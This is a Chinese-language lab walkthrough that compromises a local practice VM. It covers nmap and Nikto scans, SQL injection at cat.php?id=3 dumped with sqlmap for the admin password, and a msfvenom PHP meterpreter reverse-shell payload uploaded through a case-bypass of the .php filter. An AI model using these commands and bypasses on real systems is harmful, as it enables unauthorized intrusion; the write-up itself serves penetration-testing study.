靶机地址:
链接:https://pan.baidu.com/s/1MhYXwhaJ8u08-b-6fg4lXg
提取码:8520
准备环境:
vm下kali系统和靶机
kali:192.168.111.128
靶机:192.168.111.130
首先进行信息收集这里我们用到端口扫描之王-nmap
namp -sV 192.168.111.130 探测端口服务版本
由此我们得到开放了22和80端口 对应的服务分别是ssh和apache
然后我们再进一步探测 使用Nikto -host http://192.168.111.130 // 探测敏感信息
分析信息可以得到后台目录存在/admin/login 目录下
尝试弱口令登录后无果 继续寻找信息
使用owasp zap 找到存在sql注入
存在sql注入在http://192.168.111.130/cat.php?id=3
然后使用神器sqlmap跑一下 目的得到后台管理员账号和密码
此处不得不感叹sqlmap的强大 同样的注入点比我们手工效率要快很多
得到账号admin 密码:P4ssw0rd
然后我们可以登录后台发现可上传文件
是我们拿shell最简单的方式
由此我们可以想到可以使用msf的生成一个php木马文件来反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.111.128 lport=4444 -f raw >shell.php
由此我们在桌面上生成了一个shell.php的文件
然后我们需要用到msfconsole
然后设置好我们需要设置的 LHOST(kali地址)和lport(监听端口之后)
进行反弹shell
然后我们exploit或者run就可以开启监听
然后把我们制作好的shell.php上传 发现不允许上传.php后缀文件
这里我们用最简单的大写绕过 改为shell.PHP
然后我们可以点击shell 如果没出错的话 kali里边是有反弹的
可以看到攻击成功 顺利拿到shell
整个测试很简单 但是 需要我们思路明确能清楚每一步的步骤和目的
此教程仅用于实验测试。